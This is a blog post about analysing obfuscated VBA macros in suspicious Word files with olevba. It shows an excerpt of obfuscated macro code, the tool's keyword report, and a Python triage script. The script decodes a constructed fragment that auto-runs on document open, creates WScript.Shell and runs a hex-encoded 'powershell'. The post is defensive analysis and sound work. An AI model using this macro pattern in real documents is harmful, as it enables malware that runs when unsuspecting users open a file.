Obfuscated VBA macros in word files / 2016-06-07

I wanted to look at some suspicious Word files to see whether the macros tried anything funny. Some searching turned up oletools, whose olevba script extracts the VBA macros from an Office document and reports auto-executing entry points, suspicious keywords and encoded strings. A sample of the extracted (heavily obfuscated) macro code:
Public Sub ZkBWG(ByVal uSHdvTl As String)
Dim RxXFgnMOu As Integer
VOyiBpZDIb.cFRHErvQ OdAkk.VWUUdYKG(553, JocsGn("PlJlXeAhESM.MtxpOizrMccS2W")), _
uSHdvTl, JocsGn("LcxeVxVE")
End Sub
Private Function xcOdDXhiP() As Integer
Dim NJuBRTz As String
Dim RemmeQk As Integer
xcOdDXhiP = 400
End Function
Private Function JocsGn(ByVal gAVndNSJ As String) As String
JocsGn = ZYkwp.kYxFEH(gAVndNSJ)
End Function

The keyword report oletools produced for the same file:

+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| AutoExec   | Document_Open  | Runs when the Word document is opened   |
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | CallByName     | May attempt to obfuscate malicious      |
|            |                | function calls                          |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
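To make the report above concrete, here is an added example (my own code, not oletools') that re-implements the gist of that triage on a constructed macro fragment modelled on the sample: it looks for auto-execution entry points and suspicious identifiers, classifies quoted literals as hex or base64, and prints the same box table. The keyword lists are a small subset I chose, the decoder name Unmask and both encoded literals are invented, and the printable-ASCII check on decoded strings is my own heuristic to cut false positives (olevba reports the pattern matches themselves).

```python
"""Minimal re-implementation of the olevba 'Type | Keyword | Description' triage
for VBA source text. Added example, not oletools' own code; the keyword lists
and the hex/base64 heuristics are this example's own choices."""
import base64
import binascii
import re

# Constructed macro fragment, modelled on the obfuscated sample above; the
# decoder name Unmask and both encoded literals are invented for this example.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim cmd As String
    cmd = "706F7765727368656C6C"
    Set sh = CreateObject(Unmask("V1NjcmlwdC5TaGVsbA=="))
    CallByName sh, "Run", VbMethod, Unmask(cmd)
End Sub
'''

# Small subset of triggers; olevba ships a much longer list. The first three
# descriptions are the ones olevba printed above, the rest are my wording.
AUTOEXEC = {
    "Document_Open": "Runs when the Word document is opened",
    "AutoOpen": "Runs when the Word document is opened",
    "Workbook_Open": "Runs when the Excel workbook is opened",
}
SUSPICIOUS = {
    "CreateObject": "May create an OLE object",
    "CallByName": "May attempt to obfuscate malicious function calls",
    "Shell": "May run an executable file or a system command",
    "Environ": "May read system environment variables",
}

# VBA string literal: double quotes, with "" as the escaped quote.
STRING_LITERAL = re.compile(r'"((?:[^"\n]|"")*)"')
# Whole-identifier match so that e.g. "Shell" does not hit "ShellExecuteA".
IDENT = r"(?<![A-Za-z0-9_]){}(?![A-Za-z0-9_])"


def _printable(data: bytes) -> bool:
    """Heuristic: only accept decodings that are entirely printable ASCII."""
    return bool(data) and all(32 <= b < 127 for b in data)


def decode_hex(s: str):
    """Return decoded text if s is an even-length hex string of >= 4 bytes."""
    if len(s) < 8 or len(s) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", s):
        return None
    raw = bytes.fromhex(s)
    return raw.decode("ascii") if _printable(raw) else None


def decode_base64(s: str):
    """Return decoded text if s is well-formed base64 of >= 8 characters."""
    if len(s) < 8 or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("ascii") if _printable(raw) else None


def find_encoded_strings(vba: str):
    """Classify quoted literals; hex is tried first, base64 only on the rest."""
    hexes, b64s = {}, {}
    for lit in STRING_LITERAL.findall(vba):
        lit = lit.replace('""', '"')
        decoded = decode_hex(lit)
        if decoded is not None:
            hexes[lit] = decoded
            continue
        decoded = decode_base64(lit)
        if decoded is not None:
            b64s[lit] = decoded
    return hexes, b64s


def analyze(vba: str):
    """Produce (Type, Keyword, Description) rows in the order olevba uses."""
    rows = []
    for kw, desc in AUTOEXEC.items():
        if re.search(IDENT.format(re.escape(kw)), vba):
            rows.append(("AutoExec", kw, desc))
    for kw, desc in SUSPICIOUS.items():
        if re.search(IDENT.format(re.escape(kw)), vba):
            rows.append(("Suspicious", kw, desc))
    hexes, b64s = find_encoded_strings(vba)
    if hexes:
        rows.append(("Suspicious", "Hex Strings",
                     "Hex-encoded strings were detected, may be used to obfuscate strings"))
    if b64s:
        rows.append(("Suspicious", "Base64 Strings",
                     "Base64-encoded strings were detected, may be used to obfuscate strings"))
    return rows


def format_table(rows):
    """Render rows in the +---+ box style olevba prints."""
    header = ("Type", "Keyword", "Description")
    widths = [max(len(r[i]) for r in rows + [header]) for i in range(3)]
    sep = "+" + "+".join("-" * (w + 2) for w in widths) + "+"

    def fmt(r):
        return "| " + " | ".join(c.ljust(w) for c, w in zip(r, widths)) + " |"

    return "\n".join([sep, fmt(header), sep, *map(fmt, rows), sep])


if __name__ == "__main__":
    print(format_table(analyze(SAMPLE_VBA)))
    hexes, b64s = find_encoded_strings(SAMPLE_VBA)
    for enc, dec in {**hexes, **b64s}.items():
        print(f"{enc!r} -> {dec!r}")
```

Run against the constructed fragment this yields the same five rows as the report above, and the decoded literals show what the obfuscation hides: the hex string is a command name and the base64 string is the COM class handed to CreateObject. With the real tool, `olevba --decode <file>` prints the decoded hex and base64 strings alongside the keyword table, which is usually enough to tell a dropper from a harmless macro without executing anything.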

Koos van den Hout, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4.